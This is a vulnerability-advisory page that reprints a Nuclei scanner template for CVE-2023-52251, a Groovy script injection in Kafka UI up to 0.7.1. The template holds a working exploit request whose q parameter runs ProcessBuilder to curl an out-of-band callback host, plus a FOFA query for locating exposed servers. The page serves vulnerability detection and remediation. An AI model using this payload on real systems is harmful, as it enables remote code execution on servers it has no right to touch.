CVE-2023-52251: Kafka UI 0.7.1 Command Injection

日期: 2025-08-01 | 影响软件: Kafka UI | POC: 已公开

漏洞描述

An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.

PoC代码[已公开]

id: CVE-2023-52251

info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  impact: |
    Authenticated attackers can inject and execute arbitrary commands via Groovy script injection in the filterQueryType parameter.
  remediation: |
    Upgrade Kafka UI to version 0.7.2 or later.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
    cwe-id: CWE-94
    epss-score: 0.93057
    epss-percentile: 0.99774
    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: provectus
    product: ui
    framework: kafka
    fofa-query: icon_hash="-1477045616"
  tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm,vuln,vkev

http:
  - raw:
      - |
        GET /api/clusters HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: cluster-name
        internal: true
        json:
          - '.[0].name'

  - raw:
      - |
        GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: topic-name
        internal: true
        json:
          - '.topics[].name'

  - raw:
      - |
        @timeout 20s
        GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'Assigning partitions'
# digest: 4b0a00483046022100ad6a4d9fa9a694c42b016a98a89f43483be9d4a3d4e28486c0412b099888183c022100a8711fb7062fcdec4f917c3baaef5da79ca0d8c4a681a963515954daed72acb2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-52251.yaml

相关漏洞推荐